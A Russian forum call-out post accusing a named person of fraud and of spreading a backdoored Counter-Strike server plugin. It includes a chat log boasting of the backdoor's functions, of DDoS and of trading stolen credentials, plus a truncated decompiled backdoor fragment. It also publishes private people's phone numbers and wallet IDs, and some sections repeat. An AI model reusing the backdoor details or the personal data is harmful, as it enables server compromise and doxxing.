Для начала давайте разберемся кто он, а кто автор данной статьи. Начнем с меня. Я - Кузьменков Сергей, житель г. Магнитогорск. Он - Михайлов Роман, житель Московской области, человек, который редко, но метко светится в информационном поле с темами о том, что он кого-то кинул, кого-то перекрысил. Человек не отличается высоким умом, на все темы пишет, что они - клевета, якобы он такой "культурный".
Глава 1. Основание проекта Rembers, первый случай мошенничества.
В далеком 2014 году был создан такой проект как Rembers, точнее клан. Конечно же он был сделан двоими знакомыми - Николай (г. Орёл) и Роман (наш обвиняемый). В конце 2014 года Роман украл у Николая доступы к FTP, ПУ хостингом мультихост и забрал проект под свое владение. Первого основателя кинул на дни аренды, кинул на раскрутки, плагины и т.д. Те, кто в проекте давно данное явление могут подтвердить.
Глава 2. Регистрация доменного имени Rembers.ru (начало лета 2016).
Данное доменное имя было занято на фейковые данные, которые не являются данными нашего фигуранта. Т.к. на момент начала лета 2016 года данной особи не было 18 лет, следовательно доменное имя он на себя не мог оформить, т.к. являлся несовершеннолетним.
Глава 3. Первая крупная тема о мошенничестве на портале c-s.net.ua (мошенничество связанное с воровством вип-привилегий на мониторингах).
Глава 4. Заражение серверов бекдорами, было заражено свыше 500 серверов серверо-держателей.
Если взять плагин из топика на другом форуме и декомпилировать, то будет виден вредоносный код, о котором писал автор выше:
Глава 1. Основание проекта Rembers, первый случай мошенничества.
В далеком 2014 году был создан такой проект как Rembers, точнее клан. Конечно же он был сделан двоими знакомыми - Николай (г. Орёл) и Роман (наш обвиняемый). В конце 2014 года Роман украл у Николая доступы к FTP, ПУ хостингом мультихост и забрал проект под свое владение. Первого основателя кинул на дни аренды, кинул на раскрутки, плагины и т.д. Те, кто в проекте давно данное явление могут подтвердить.
Глава 2. Регистрация доменного имени Rembers.ru (начало лета 2016).
Данное доменное имя было занято на фейковые данные, которые не являются данными нашего фигуранта. Т.к. на момент начала лета 2016 года данной особи не было 18 лет, следовательно доменное имя он на себя не мог оформить, т.к. являлся несовершеннолетним.
Глава 3. Первая крупная тема о мошенничестве на портале c-s.net.ua (мошенничество связанное с воровством вип-привилегий на мониторингах).
В общем, дабы добиться справедливости по поводу данного человека. На самом деле, я его активность в плане обмана наивных школьников увидел еще год назад, да вот прямых доказательств не было по данному поводу. Я на это дело забил... но вот тут произошло то, что данный человек, несмотря на то, что кинул моего знакомого на 450 рублей, так еще и предлагал плагин, который якобы добавляет сервера без очереди в раскрутку gs-monitoring. Честно у меня по началу был смех, но потом, от скуки решил декомпилировать данный плагин и посмотреть на тот чудо код, в итоге я увидел данные от бд, куда посылался запрос с данными (рконы, бд сервера), а в той базе висело около 540 серверов. Это же сколько он людей обманул!? так это только одним плагином, а на деньги!? меня это взбесило, почему эта персона остаётся безнаказанной?
Прежде, чем смотреть скриншоты, я вам кое что объясню. Скорее всего обманывая людей, он работал не один, а возможно то просто его 'фейк' страницы, ибо по рассказам в группе amx-x(.ru) он держит 'стадо' этих ботов.
1 страница:
2 страница:
Кошельки, которые засветились в этих переписках:
Qiwi:
+79257582753 (Алексей Ферфул)
Ник: FeirFor
+79670514704 (Роман Мозер)
Почта: [email protected]
Skype: mozer888
+79653635489 (Владимир Весельчак)
Webmoney:
R107392833016 (Роман Мозер)
WebMoney Passport
док-ва -
Еще док-ва от пользователя
Его страница вк:
Его кс портал -
Сообщество -
Сервера
212.76.140.45:27015 - Army Ranks [Главный] © ツ
212.76.140.45:27016 - AIM PUB | CW © ツ
212.76.140.45:27017 - Deathrun © ツ
212.76.133.68:27015 - M T.T © ツ
212.76.133.68:27016 - Surf © ツ
212.76.133.68:27017 - Classic PUB © ツ
Группа вконтакте -
Хостинг -
Прежде, чем смотреть скриншоты, я вам кое что объясню. Скорее всего обманывая людей, он работал не один, а возможно то просто его 'фейк' страницы, ибо по рассказам в группе amx-x(.ru) он держит 'стадо' этих ботов.
1 страница:
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
- Алексей Ферфул, известный в некоторых кругах человек, активно распространяет информацию об хостинге rembers. Был замечен на amx-x под ником FeirFor.2 страница:
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
(По скриншотам, Алексей Ферфул писал данному человеку, о покупке раскрутки).Кошельки, которые засветились в этих переписках:
Qiwi:
+79257582753 (Алексей Ферфул)
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Ник: FeirFor
+79670514704 (Роман Мозер)
Почта: [email protected]
Skype: mozer888
+79653635489 (Владимир Весельчак)
Webmoney:
R107392833016 (Роман Мозер)
WebMoney Passport
док-ва -
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Еще док-ва от пользователя
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
-
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Его страница вк:
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Его кс портал -
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Сообщество -
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Сервера
212.76.140.45:27015 - Army Ranks [Главный] © ツ
212.76.140.45:27016 - AIM PUB | CW © ツ
212.76.140.45:27017 - Deathrun © ツ
212.76.133.68:27015 - M T.T © ツ
212.76.133.68:27016 - Surf © ツ
212.76.133.68:27017 - Classic PUB © ツ
Группа вконтакте -
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Хостинг -
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Глава 4. Заражение серверов бекдорами, было заражено свыше 500 серверов серверо-держателей.
Управление вашими серверами
Вк переписка
Вк переписка
Код:
Сергей
Здарова
16.06.16
Алексей
Здравствуйте!
16.06.16
Сергей
Роман Мозер сказал к тебе
16.06.16
Я по поводу реконекта с моего сервера
Алексей
да, он меня долго палить будет еще ?
16.06.16
Сергей
А че он?
16.06.16
Алексей
да он меня палит всем что я серваки хакнул
16.06.16
контракт разорвал после того как я ему случайно редирект поставил
��
с ним не связывайся он обидчивый зануда
вот щас нафиг он сказал двоим уже
антиддос установил жаль (
Сергей
На сервер?
16.06.16
Что ле?
А как это "антидеддос" ?
Алексей
антиддос у него на хостинге есть
16.06.16
Сергей
на любом увожаемом себя хосте есть фильтрация траффика
16.06.16
Слыш
А че где бэгдор зашил?
Алексей
ну не с хоста же ддос идет
16.06.16
Сергей
Не тупи ок)
16.06.16
давай по делу
Алексей
ну я говорю гоу сотку я дам инфу
16.06.16
Сергей
Не тупи, еще раз говрю, найти бэгдор дело 9ч- до 1 д
16.06.16
Алексей
ну ищи ищи, проще откупиться
16.06.16
Сергей
Ебалн в натуре, че ты ***ню то мишане чешешь
16.06.16
Пересланные сообщения
Михаил16.06.16
Пересланные сообщения
Как ты хостинг заразить мог
Че ты в натере
Алексей
да я все могу
16.06.16
и тебе интернет отрубить тоже
Сергей
Почему я модули перекомпилировать не смогу?
16.06.16
хахаха
Ой епта
Угадай как я обойду твой супер пупер отруб
Ип сменю
)
Пересланные сообщения
Сергей16.06.16
Почему я модули перекомпилировать не смогу?
Алексей
ну это если на этом же хостинге то модули по стандарту те же самые будут
16.06.16
потому что ума не хватит
Сергей
Эмм, а если залить свои?
16.06.16
а , не варик/?
АА, дай угодаю , х=остинг их не примит?
хахаха
Алексей
возможно, что тебе всю платформу перезаливать придется...
16.06.16
Сергей
АА, платформу
16.06.16
Алексей
кто знает, может и в билде
16.06.16
Сергей
в билде
16.06.16
вона как
Алексей
а может и конфиги все пролистать надо
16.06.16
Сергей
ты с gihub
16.06.16
?
а
Алексей
ну ищи ищи
16.06.16
Сергей
Че ты на вопрос то ответь
16.06.16
Алексей
потому что ты не узнаешь
16.06.16
избавился ли ты
потому что я например эту функцию включаю и выключаю сам
например не включу и включу через месяц
вот подпрыгнешь
когда серв оффнется
или когда я через бекдор плагины сам поставлю
или удалю там что н
без фтп думаешь это нереально
Сергей
лол, какая платформа, какие конфиги, я скачал из инета плагин, и он с бэгдором, и все. Гений, в натуре, это делают такие мыши как ты уже много лет
16.06.16
Алексей
ну посмотрим посмотрим
16.06.16
хоть амхмод отруби
Сергей
Давай двай
16.06.16
Все не чеши
Алексей
вот только ты не узнаешь, потому что функция щас выключена
16.06.16
Сергей
лол
16.06.16
иди на***\
***абол
все не пиши ,чучело
Алексей
сосни ***, дрочни залупу
16.06.16
Сергей
на уши ты присаживаешся
16.06.16
Алексей
какой айпи там у тебя
16.06.16
Сергей
Найди
16.06.16
Алексей
195.2.252.142:27016 ?
16.06.16
Сергей
Точно
16.06.16
Го ты ддось, а я трафик отфильтрую щя
что то даже фпс не просел
Алексей
195.88.209.48:27058 ?
16.06.16
Сергей
нее
16.06.16
го тебе свой ип инета дм
дам
Алексей
айпи сервака гоу
16.06.16
Сергей
Ты же писал
16.06.16
195.2.252.142:27016
Добро пожаловать
Алексей
да кому гонишь
16.06.16
Сергей
Че ты
16.06.16
В натуре
Алексей
аа
16.06.16
ну да
есть такое
Сергей
Нуу
16.06.16
Слуш, положишь , я тебе заплочу даже
Алексей
да ща все будет не сцы
16.06.16
Сергей
Только если положишь именно сервер, а не ип
16.06.16
Тачку любой дурачок заддосить может
Лха
луха
леха
что там
Алексей
ну ща увидешь
16.06.16
Сергей
жду
16.06.16
Хватит
о нет
Какаой высокий fps
Бля
Не поднимай его
����
Алексей
да я лучше разок ебну и упадет серв
16.06.16
Сергей
ебаш
16.06.16
Алексей
так норм ?
16.06.16
Сергей
такк
16.06.16
Алексей
а хочешь покрасивее сделаю
16.06.16
Сергей
красава
16.06.16
Алексей
что ты долго думать будешь
16.06.16
как исправить
движок удалю нафиг
Сергей
GameAP Я так и знал
16.06.16
Алексей
ну да
16.06.16
Сергей
Да да да да
16.06.16
Я знал
Алексей
с бекдором это не связано
16.06.16
Сергей
Иди на*** черт
16.06.16
Алексей
это было через стрейсер
16.06.16
а щас будет
через твою админку
Сергей
какую?
16.06.16
ник админки
Чувак го залей плагин какой нить
Алексей
у бомжа базы данных нету чтоли
16.06.16
а жаль
Сергей
От чего конкретно
16.06.16
Алексей
банлист и т д
16.06.16
Сергей
Есть)
16.06.16
Алексей
амхбанс ?
16.06.16
Сергей
нее
16.06.16
шляпа
Алексей
фреш ?
16.06.16
Сергей
там бегдоры
16.06.16
Нее, не скажу
Размер базы данных 259.43Kb
Алексей
скайп есть ?
16.06.16
или почта
Сергей
Логнин парот
16.06.16
А
че
Алексей
опачки )
16.06.16
хмхмхм
Сергей
Че там
16.06.16
Алексей
если получится то сообщу
16.06.16
че то я твою бд не найду
че за дела
может щас почту хотябы
че почту страхово кинуть ?
Сергей
Нах те
16.06.16
Алексей
да я покажу для чего
16.06.16
Сергей
ты же чудо хакер
16.06.16
Алексей
ну они нигде не указана
16.06.16
Сергей
Есть
16.06.16
Указана
рой
Попробуй перебросить игроков
Сергей
или положи сервер
16.06.16
щяс
Алексей
вот и все
16.06.16
Сергей
что все?
16.06.16
Алексей
Капец серваку
16.06.16
Сергей
Да
16.06.16
Что ты сдела?:
Алексей
Сосни и узнаешь
16.06.16
Сергей
Не в натуре
16.06.16
че ты
Алексей
Откупиться проще было барану
16.06.16
Сергей
Ну скажи мне что пипец то ему?
16.06.16
ЧТо с ним?
Алексей
Оффнут и не встанет
16.06.16
Сергей
Имя сервера: Тигровый [public] 18+
Текущая карта: $2000$
Игроки: 2/32
Пароль: Не задан
Подключиться к серверу: steam://connect/195.2.252.142:27016/
16.06.16
У меня такая инфа
что он работает
Алексей
2 а было 32
16.06.16
Сергей
И че
16.06.16
Алексей
Ну зайди
16.06.16
Узнаешь как работает
Зайти нереально туда
Сергей
А почему??
16.06.16
Только что там был?
!
Алексей
16.06.16
Сергей
Что
16.06.16
Алексей
Да не забей
16.06.16
Сергей
Ну бля давай я велючу щяс
16.06.16
Заходи
Там перекидывай
ложи сервер
что там езе
еще
Алексей
Ладно продолжу попозже немного
16.06.16
Сергей
Положи
16.06.16
или че
Алексей
Хер тебе )
16.06.16
Сергей
Пожалуйсто
16.06.16
Алексей
16.06.16
Сергей
Сука, значит не можешь
16.06.16
Ясно
Алексей
До
16.06.16
узнаешь )
Сергей
Если щяс перекинешь народ , то я мише скажу что бы он тебе бабла кинул
16.06.16
Ну и, прекращяй пугать, мне в принцапи по***, чисто интерес
Алексей
Ну вот не узнаешь
16.06.16
Сергей
Потому что не можешь
16.06.16
Это же бонально
Алексей
16.06.16
Сергей
Бэгдор в плагине
16.06.16
Больше негде
Алексей
Когда ты на толчке сидеть будешь тогда и ебну
16.06.16
Алексей
На толкан скоро идешь ?
16.06.16
Сергей
Уже
16.06.16
Че перекинуть готов?
Алексей
16.06.16
Да я то всегда готов, но надо когда ты не знаешь об этом
Сергей
ПОтомучто ты лол
16.06.16
Алексей
Ага
16.06.16
Сергей
Бегдор в плагине
16.06.16
Чуть позже скажу в каком
Алексей
ну да
16.06.16
Сергей
хотя наверно он был в скомпилрованом только
16.06.16
Ты же мразь прошаренная
Алексей
В каком плагине у меня плагинов тоже много было ?
16.06.16
Сергей
Я ебу
16.06.16
Ладно по*** мне не оправдывайся
Алексей
я так сделал что не спалят даже если у тебя плагин попался )
16.06.16
Ни у кого нету таких технологий
Сергей
О бог
16.06.16
Ну докажи щяс мне это
И тебе заплатят
ПОтому что тут и я потеряюсь
в доводах
Алексей
Заплатят ***юлями если то я не сомневаюсь )
16.06.16
Сергей
Как ты и просил заплатят 100р, лично могу 500 накинуть за исходник
16.06.16
Алексей
Исходник я за 2к продавал этот
16.06.16
Сергей
Продал?
16.06.16
Алексей
Да, кто ж такой код не купит
16.06.16
Сергей
Это же смешно 2к тратить на это боловство
16.06.16
всего 1-2% его поставят себе на сервер
Алексей
Это ты просто не знаешь
16.06.16
Сергей
Сколько народу?
16.06.16
Алексей
у меня эти сервера все есть в панели
16.06.16
И их больше чем 300 щас
Я могу со всех серверов перекинуть на любой айпи
Сергей
То есть ты щяс можешь любой сервак крутануть?
16.06.16
плагин посылает клиенту команду сonnect :?
бля ну 2к это много
Мож на 700р сойдумся
Алексей
любой лучше чем бусты страйкса
16.06.16
Сергей
Мож мне щя крутануть?\
16.06.16
Дабы убедится?
Алексей
для этого неплохо модерку иметь где нибудь иметь
16.06.16
Сергей
!
16.06.16
Алексей
Ну ты плагин спалишь если у тебя плагин
16.06.16
Сергей
что
16.06.16
переформулируй
слова
Алексей
Спалишь бекдор где находится
16.06.16
Сергей
Кому?
16.06.16
или че, а если ты щяс это сделаешь
?
Алексей
Себе, я могу попробовать как н в тайне забустить и потом написать, завтра
16.06.16
Сергей
Ты щяс мне сможешь подтвердить свои слова действиями? 195.2.252.142:27016
16.06.16
кидай 20 чел
Если подтвердишь, будем решать за сколько ты его мне продашь
Алексей
ну ладно
11:06:39
Алексей
тест ну могу щас попробовать
15:26:48
это до теста
это щас
через минуту
обычно вечером получше крутит
ну вот было где то 10 стало 20
Сергей
Че ты чешишь мне скринами то. Не мог сделать это когда я просил
18:24:34
Для меня скрины не чего не значат
Темболее сервер на раскрутке стоит
И с 10 до 20 ему нужны минуты что бы наполнится
Сергей
Давай будем вместе в онлайне и все проверим
18:40:28
Алексей
ну гоу щас
19:53:00
Сергей
Сек
19:53:07
195.2.252.142:27015
10 чел
Алексей
ну ща попробую
19:53:51
Сергей
давай только бегом он тоже на раскрутке
19:53:52
Алексей
ye ghbhjcn tcnm e;t
19:55:38
ну прирост есть уже
Сергей
Говорю же на раскртке
19:56:01
что то щяс было 27 , стало опять 23
Алексей
небольшой прирост
19:56:48
Сергей
Да не
19:57:37
Алексей
не почти не крутит панель щас
19:57:38
надо плагинов еще повыкладывать
Сергей
АА, слуш интересно мне одно. Плагин после запуска на сервере заражает какие еще файлы?
19:58:20
Алексей
ну это все зависит от того как распространять плагин, раньше неплохо крутило, щас много серверов оффнуты
19:58:45
нет
вот например все данные приходят
в панель
оттуда можно уже что угодно
Сергей
Ну вот, я думат там какой то супер пупер ког
19:59:18
Алексей
и в самом бекдоре функционал есть
19:59:24
Сергей
код
19:59:28
Алексей
ну функционал широкий да
19:59:38
можно оффнуть сервер, прочитать файлы
закачать файл
скачать
потом
в базу проникнуть
Сергей
угу
20:00:00
Алексей
ломануть почту
20:00:05
пароли обычно подходят
Сергей
эммм, сшел подогдал его тебе?
20:00:18
подогнал
Алексей
шел такое не сможет сделать
20:00:33
ну хотя хз может если посидит месяца 3
лично я за 2 месяца это делал
Сергей
Шел сделал круче, вот только делится не хочет
20:00:52
Алексей
в чем у него лучше ?
20:01:03
Сергей
Запускаешь сервер на веб сайте, чувак заходит на него и делай с его виндой что хош
20:01:22
Алексей
если плагин хорошо распространить то серв забьет за несколько секунд
20:01:32
это гон
с виндой ничего не сделать
Сергей
НЕ не
20:01:46
У меня лично исход был
Гыы, только винда слетела, и я его проебал
Алексей
винду игрокам сносить ?
20:02:28
если там какой то автоскрипт закачивать
Сергей
Не сносить, а повредить можно
20:02:43
Я щяс приду
не уходи
Алексей
ну хз, я знаю что можно дисковод открыть
20:02:59
ну я делал ради раскрутки
с 1 плагина раньше еще норм крутило
щас уже давно не выкладывал его никуда
в сентябре где то
в консоле вводишь setinfo _префикс пароль
и команды доступны
и защита чтобы не спалили там есть
Сергей
Круто, ты сам то давно скриптингом увлекаешся?
20:07:34
Алексей
довольно давно
20:07:48
админов прикольно взламывать
как то взломал почту а там топ мс и страйкс
и скайп
Сергей
Ну это да
20:08:17
Алексей
арена если приходит то можно акк взломать навсегда
20:08:24
Сергей
Могу тебе базу неплохую подогнать
20:08:24
Алексей
ну у меня с базой норм все
20:08:42
у шела не знаю что за бекдор, на с++ может написан
Сергей
У меня на сайте дурачки регаются, одни и теже пароли используют, я вот только все заморочится не могу
20:09:08
Алексей
там разве не мд5 ?
20:09:32
Сергей
Нее, у меня открытие
20:09:49
Алексей
ну это палевно, сайт палится же
20:10:10
а что за сайт
Сергей
Ну в Бд соответственно шифруются
20:10:18
Алексей
у мозера хотел с помощью его хостинга так делать, он пока не соглашается
20:10:41
Сергей
Не важно что за сайт. Главное что он игровой
20:10:56
Кс
Алексей
с плагинами ?
20:11:12
и раскручен ?
Сергей
Нее, игровой портал
20:11:26
Алексей
ну на порталах обычно материалы есть
20:11:39
Сергей
суточный трафик где то 50-60 ч
20:11:49
Алексей
если сделать то тебе ничего не стоит будет раскрутить панель свою потом
20:11:58
Сергей
Я тебе про базу мыл и паролей говорю
20:12:04
Алексей
ну если сайт раскручен то можно там поддомен сделать, наверху кнопку на поддомен и там плагины выкладывать
20:12:38
чтобы бекдор распространять
Сергей
Можно и так
20:13:12
Алексей
там где я модер пока неособо народу
20:13:14
Сергей
Кстати у меня есть парни которые сервера держат
20:13:35
Алексей
ну я этот бекдор писал месяца 2, продавал за 2к, ну могу за 1.5 со скидкой
20:13:43
плагин кстати могу сказать какой
killeffect вроде он
Сергей
Нее, покупать я не буду. Я компромис ищу. Я тебе ты мне
20:14:10
Алексей
там где шарики вылетают
20:14:17
компромисс по цене 1.5 к ?
Сергей
У меня нет такого
20:14:53
Алексей
например какой
20:14:58
скинь список плагинов
Сергей
я тебе базу, мож из неё сбрутишь че. А ты мне исход
20:15:26
Алексей
что за база ?
20:15:50
от банлиста ?
Сергей
Неее
20:16:09
База от сайта где зарегестрированы люди которые занимаются серверами и просто играют в вк.
100% там есть те у которых есть сервера
Алексей
от твоего сайта ?? зачем тебе свою базу сливать
20:18:01
Сергей
Потому что самому не интересно это, воровать акки, и т.д . Да и + хочу этот исходник
20:18:50
Алексей
что за сайт ?
20:19:17
смотря какой сайт
Сергей
Игровой
20:19:34
Алексей
ну их куча
20:19:37
Сергей
Мозг не делай, я не дам url , а то ломать начнешь
20:19:57
ддосы, хуесы
Алексей
сайт так просто не ломануть
20:20:07
Сергей
бруты
20:20:14
Алексей
стрейсера у меня нету
20:20:21
т к там железо свое надо
Сергей
Ну как не ломануть ,ты мой ник знаешь , поставил на брут и все
20:20:32
через недельку 2 , забрал базу сам. Ну его
Алексей
да эти бруты не ломают так как надо
20:21:36
там комбинаций бесконечность
Сергей
нее, если с умом подойти
20:22:25
Алексей
один сплоит есть нормальный
20:22:37
Сергей
и базу паролей норм иметь
20:22:37
Алексей
хотел его проверить
20:22:44
Сергей
У меня парниша есть , он мой пароль сбрутил за 2 недели
20:22:53
Алексей
195.2.252.142:27015 коннект есть ?
20:24:50
если дпрото 356 то можно хакнуть почти что угодно
Сергей
У нас ReHLDS
20:27:02
То есть Renion
Алексей
ну тебя этим эксплоитом не ломануть
20:27:22
Сергей
Я знаю
20:27:35
Алексей
можно если старый кого нибудь
20:27:37
Сергей
НУ это то да
20:27:46
Так че насчет бэгдора
*?
Алексей
ну база неизвестно какая я думаю не пригодится
20:28:30
неизвестно что за сервера если вообще войду в них
и хост не так просто найти
у меня то сразу все данные пишет
если кс на диске С то можно подпортить винду
Сергей
Я чисто для проверки взял первый попавшийся акк, и защел на мыло с 1 раза
20:29:22
Алексей
если нет то никак
20:29:23
ну я хз хз, в перед бекдор кидать не стану
а если наоборот то ты не поверишь что я скину потом
Сергей
Ну давай на чистоту
20:31:08
Есть же варик верно?
Алексей
ну если базу, то с хостом, на котором она находится, и базу вперед
20:31:58
там панелька и через нее меняются пароли
Сергей
Смотри базу мне в ручную делать придется. так как заходишь на сайте в упровление пользователями и там уже его мыло и пароль, а в самой БД они защифрованные
20:34:05
СЛуш а у тебя щяс сколько серверов зараженные?
Алексей
ну они пустые большинство, ща посчитаю
20:35:20
Сергей
Посчитай полные
20:35:48
на которых онлайе есть
Алексей
750, некоторые удалены, некоторые пустые
20:36:08
полных наверное 10 не больше
если остались
некоторые удалили бекдор
Сергей
ВОт , давай еще разок, кинь на мой сервер всех игроков
20:36:41
мне нужно 16 ч
195.2.252.142:27015
Алексей
да моя панель полуживая, не крутит
20:37:27
месяц назад норм еще было
если плагина 2-3 выложить то норм будет
Сергей
Да давай сколько сможешь
20:37:51
у меня щяс онлайн просел
Алексей
базу отдельно от сайта отдать нереально же, или сам сайт в обмен на исход ?
20:39:05
Сергей
неее ты че
20:39:19
Я соберу данные своих пользователей
сам
в ручную
Алексей
сколько их ?
20:39:46
Сергей
где 150
20:40:04
где то 150 200
Алексей
ну хз, если данные вперед, то можно, а бекдор вперед нельзя кидать
20:40:23
Сергей
Почему
20:40:38
Алексей
потому что мне неохото быть кинутым��
20:40:58
Сергей
Я щяс самогу парсер запустить и все вкусняшки своих игроков себе забрать
20:41:03
Да мне тоже
Алексей
ну хз, бекдор вперед не собираюсь кидать
20:41:22
Алексей
твое дело
20:41:27
Сергей
Это извени акк стим, да я расказываю там может быть любой кух
20:41:32
куш
Алексей
так может и риск но исходник есть шанс получить
20:41:48
а мне данные неособо то и нужны
Сергей
Да ладно , ты щяс ведь понимаешь что там может быть
20:42:23
Так же как и я
Верно
Алексей
ну если тебе нужен исход то данные вперед
20:43:21
мне они неособо нужны
твое дело
Сергей
Понятно, если ты намерен поступить честно так же как и я . Давай воспользуемся гарантом
20:44:17
?
Алексей
каким
20:45:01
Сергей
с кснета например
20:45:19
Алексей
всм, что с кснета ?
20:46:06
Сергей
нее, хотя не подойдет
20:46:59
Алексей
ну тебе нужно, риск небольшой, тем более смысл мне разводить
20:47:47
Сергей
да я про c-s.net.ua Нам нужно нейтральное не заинтересованное лицо
20:47:47
�� мне так то тоже нету.
Но вот видишь договорится не можем
Алексей
да прям не подставное оно и лицу еще сливать код
20:48:20
ну если ты вперед не хочешь данные кидать то никак, а так у тебя шанс есть
терять данные какие то
небольшая потеря
Сергей
не какие то. Ты сам должен понимать что там и я поиметь не плохо могу
20:49:18
Алексей
ну сам решай
20:49:44
Сергей
Ок, щяс один вопрос с тобой решим
20:50:18
Алексей
?
20:50:37
Алексей
это о чем
20:53:44
Сергей
csstatsx_sql.amxx
log_ms.amxx
aim_detector.amxx
sh_check.amxx
admin_loader.amxx
fresh_bans.amxx
admin_freelook.amxx
;alias_detector082.amxx
; Admin Base - Always one has to be activated
;admin.amxx ; admin base (required for any admin-related)
;admin_sql.amxx ; admin base - SQL version (comment admin.amxx)
; Basic
admincmd.amxx ; basic admin console commands
adminhelp.amxx ; help command for admin console commands
adminslots.amxx ; slot reservation
multilingual.amxx ; Multi-Lingual management
; Menus
menufront.amxx ; front-end for admin menus
cmdmenu.amxx ; command menu (speech, settings)
plmenu.amxx ; players menu (kick, ban, client cmds.)
;telemenu.amxx ; teleport menu (Fun Module required!)
mapsmenu.amxx ; maps menu (vote, changelevel)
pluginmenu.amxx ; Menus for commands/cvars organized by plugin
; Chat / Messages
adminchat.amxx ; console chat commands
antiflood.amxx ; prevent clients from chat-flooding the server
scrollmsg.amxx ; displays a scrolling message
imessage.amxx ; displays information messages
adminvote.amxx ; vote commands
; Map related
nextmap.amxx ; displays next map in mapcycle
mapchooser.amxx ; allows to vote for next map
timeleft.amxx ; displays time left on map
; Configuration
pausecfg.amxx ; allows to pause and unpause some plugins
statscfg.amxx ; allows to manage stats plugins via menu and commands
; Counter-Strike
restmenu.amxx ; restrict weapons menu
Statsx_Colored_TOP.amxx ; stats on death or round end (CSX Module required!)
;miscstats.amxx ; bunch of events announcement for Counter-Strike
stats_logging.amxx ; weapons stats logging (CSX Module required!)
; Enable to use AMX Mod plugins
;amxmod_compat.amxx ; AMX Mod backwards compatibility layer
; Custom - Add 3rd party plugins here
;aes_say_tag.amxx
dhud_advert.amxx
Chat_Manager.amxx
mode.amxx
;yet_another_voteban.amxx
;yet_another_spamguard.amxx
mapmanager.amxx
;mockery_of_players.amxx
;ptb_rbs.amxx
;topaward_rbs.amxx
ultimate_gag.amxx
;Resetscore.amxx
ping_kick.amxx
;vip_rbs.amxx
;kill_assist.amxx
;backweapons_rbs.amxx
;demorecorder_rbs.amxx
;steam_bonus.amxx
afk_control.amxx
;Team_Flash_Control.amxx
;steam_models.amxx
;descriptive_fire_in_the_hole.amxx
;timelimitvote.amxx
server_menu.amxx
bonus_system1.0.amxx
bonus_system2.0.amxx
20:54:08
в каком бэгдор
???
Алексей
надо вспомнить
20:56:59
Сергей
;kill_assist.amxx
20:57:07
?
Алексей
плагина нету который гранаты дает ?
20:58:04
рандомно
Descriptive 'Fire in the hole' RUS
наверное это если нету плагина с гранатами
Сергей
;descriptive_fire_in_the_hole.amxx
20:58:56
?
Алексей
наверное
20:59:04
проверить надо
Сергей
щяс есть у тебя сервер?
20:59:22
Алексей
свой ?
20:59:30
Сергей
нет, в панельки
20:59:47
?
Алексей
в панельки то он будет
20:59:55
но команды работать не будут
ща азйду проверю
Сергей
давай
21:00:09
195.2.252.142:27016
вот ип
Алексей
щас не работает бекдор
21:01:33
оставь все плагины кроме того
и смени карту
Сергей
Тот выключить да?
21:02:02
Алексей
он и так выключен
21:02:08
все остальные просто включи
Сергей
проверяй
21:03:04
Алексей
не работает
21:03:40
Сергей
Точно?
21:03:49
Алексей
да точно не бойся
21:03:58
Сергей
Щяс я парнише кину он вскроет плаг
21:04:05
Глянет
Алексей
не сможет
21:04:12
Сергей
Мм
21:04:15
Алексей
там защита от декомпиляции
21:04:19
Сергей
Бля amx уже умеют дикодировать
21:04:26
Алексей
обычный да
21:04:33
Сергей
да все обходят давно
21:04:39
Алексей
но тот который я сделал не смогут
21:04:40
Сергей
щяс посмотрим
21:04:53
Алексей
если с защитой скомпилировано то без вариантов
21:04:53
Сергей
Не не , писали тут как то про эту защиту, все обошли, наши крипткры
21:05:18
хз , щяс попробует
Алексей
ну пробуй )
ну проверяй, как видишь я честно поступил, скинешь данные (если верные) - я дам исходник, мне ничего не стоит и про защиту расскажу
21:05:57
иногда стоит рисковать
а плагин он не вскроет если это мой плагин��
Сергей
Опа как так, получится ты базу пробрутишь заберешь то что тебе нужно , а интереса скинуть мне плаг , у тебя уже не будет
21:07:03
Алексей
ну просто данные использую которые ты соберешь
21:07:25
ну кидать мне смысл какой
я так же могу сказать и про твои данные
что интереса их скинуть не будет
ну сам решай, только так можешь исход получить, труд такой относительно легко достается
Сергей
Ну да да, я об этом же. Давай искать 3лицо, которое не будет заинтересованно
21:08:39
Алексей
не, лицу исход сливать не собираюсь
21:15:27
ну ты полюбому рискуешь, потому что на другие варианты я не согласен
но твой риск стоит того
а будешь ли рисковать это твое дело сам решай, я не киданул бы
а подругому никак
до завтра подумай короче
Сергей
Ладно давай, исход мне не нужно. Риск штука серьезная.
21:18:45
У вас нет разрешения на просмотр ссылки, пожалуйста Вход или Регистрация
Если взять плагин из топика на другом форуме и декомпилировать, то будет виден вредоносный код, о котором писал автор выше:
C-подобный:
new g_var80;
new g_var84;
new g_var88;
new g_var14d8;
new g_var14dc;
public __mdb__()
{
if (contain(0, "192.168"))
{
if (contain(0, "127.0"))
{
if (is_linux_server())
{
new var1 = 0;
while (var1 < 8)
{
register_cvar(140[var1], 600[var1], 0, 0);
var1++;
}
new var2 = 0;
while (var2 < 4)
{
register_concmd(696[var2], 912[var2], -1, 1248, -1);
var2++;
}
register_logevent("__mdb_cal_round__", 2, "1=Round_Start");
set_task(1092616192, "__mdb_loader__", 0, 1448, 0, 1440, 0);
set_task(1089470464, "__mdb_senders__", 0, 1448, 0, 1516, 0);
set_task(1084227584, "__mdb_creator__", 0, 1448, 0, 1516, 0);
}
return 0;
}
return 1;
}
return 1;
}
public __mdb_bb_pub__(_arg0)
{
if (sub_18a8(_arg0))
{
return 2;
}
do {
} while (_arg0);
return 2;
}
public __mdb_cal_round__()
{
new var2 = 140 + 8;
new var1;
if (get_cvar_num(var2 + var2) && get_cvar_num(140/* ERROR unknown load Constant */ + 140))
{
return 1;
}
g_var80 += 1;
new var3 = 140 + 8;
if (get_cvar_num(var3 + var3) <= g_var80)
{
new var4 = 0;
new var5 = 0;
new var6 = 0;
get_players(var4, var5, "ch", 1596);
new var7 = 140 + 20;
if (get_cvar_num(var7 + var7) > var5)
